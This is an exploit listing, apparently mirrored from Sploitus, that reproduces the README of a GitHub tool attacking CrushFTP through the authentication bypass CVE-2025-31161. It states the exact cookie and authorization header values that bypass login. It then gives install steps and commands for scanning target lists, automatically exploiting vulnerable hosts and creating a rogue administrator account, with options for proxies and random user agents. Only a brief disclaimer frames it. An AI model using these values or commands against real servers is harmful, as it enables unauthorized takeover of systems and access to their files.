Exploit for Authentication Bypass by Primary Weakness in Crushftp CVE-2025-31161

Name: Exploit for Authentication Bypass by Primary Weakness in Crushftp CVE-2025-31161
Rating: 5 (136 reviews)
2025-05-01 | CVSS 9.8
## https://sploitus.com/exploit?id=A9656DB1-BFEC-5A9A-9B0F-7F8C1F96122C
# CVE-2025-31161 Exploit 

 exploitation  CVE-2025-31161 vulnerability in CrushFTP WebInterface.

## About CVE-2025-31161

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP's WebInterface component. This security flaw allows unauthenticated attackers to execute administrative functions by manipulating specific cookie and authorization header values.

### Vulnerability Details

- **Affected Software**: CrushFTP WebInterface
- **Vulnerability Type**: Authentication Bypass
- **Severity**: Critical (CVSS Score: 9.8)
- **Attack Vector**: Network
- **Impact**: Complete system compromise

The vulnerability exists in the authentication mechanism of CrushFTP's WebInterface, where the application fails to properly validate authentication tokens. By sending specially crafted HTTP requests with specific cookie values (`currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If`) and authorization headers (`AWS4-HMAC-SHA256 Credential=crushadmin/`), attackers can bypass authentication controls and execute administrative functions.

This exploit specifically targets the user management functionality, allowing attackers to create new administrator accounts with full system access. Once exploited, attackers can gain persistent access to the CrushFTP server and potentially access sensitive files, modify server configurations, and compromise the entire system.

## Installation

```bash
# Clone the repository
git clone https://github.com/ibrahimsql/CVE-2025-31161.git
cd CVE-2025-31161

# Install dependencies
pip install -r requirements.txt
```

## Usage

### Basic Usage

```bash
# Check a single target for vulnerability
python cve_2025_31161.py --target example.com --check

# Exploit a vulnerable target
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd

# Scan multiple targets from a file
python cve_2025_31161.py --file targets.txt --check --threads 20

# Scan and automatically exploit vulnerable targets
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
```

### Advanced Options

```bash
# Use a proxy
python cve_2025_31161.py --target example.com --check --proxy http://127.0.0.1:8080

# Export results to JSON format
python cve_2025_31161.py --file targets.txt --check --output results.json --format json

# Use custom headers
python cve_2025_31161.py --target example.com --check --custom-headers '{"X-Custom-Header": "Value"}'

# Deep vulnerability checking
python cve_2025_31161.py --target example.com --check --deep-check
```

Example Usage
![ScrennShot](https://github.com/user-attachments/assets/c278226c-a5f8-452a-a1e8-96062b226dd7)


## Command Line Arguments

### Target Specification
- `--target`: Single target host to scan/exploit
- `--file`: File containing list of targets (one per line)
- `--port`: Target port (default: 443)

### Actions
- `--check`: Check targets for vulnerability
- `--exploit`: Exploit vulnerable targets
- `--auto-exploit`: Automatically exploit targets found to be vulnerable during check

### Exploitation Options
- `--target-user`: Target user for exploitation (default: crushadmin)
- `--new-user`: Username for the new admin account to create
- `--password`: Password for the new admin account
- `--verify-exploit`: Verify successful exploitation

### Scan Options
- `--threads`: Number of concurrent threads (default: 10)
- `--timeout`: Connection timeout in seconds (default: 10)
- `--deep-check`: Perform deepers vulnerability checks
- `--only-vulnerable`: Only exploit targets that were found vulnerable

### Output Options
- `--output`: Output file for results
- `--format`: Output format (txt, json, csv)
- `--verbose`: Enable verbose output
- `--quiet`: Suppress all output except errors
- `--log-file`: Log file to write to
- `--log-level`: Log level (debug, info, warning, error, critical)

### Advanced Options
- `--proxy`: Proxy to use for requests (e.g., http://127.0.0.1:8080)
- `--user-agent`: Custom User-Agent string
- `--random-agent`: Use a random User-Agent for each request
- `--delay`: Delay between requests in seconds
- `--custom-headers`: Custom headers as JSON string

## Disclaimer

This tool is for educational purposes and authorized security testing only. Unauthorized use against systems you don't own or have permission to test is illegal.

## License

This project is licensed under the MIT License - see the LICENSE file for details.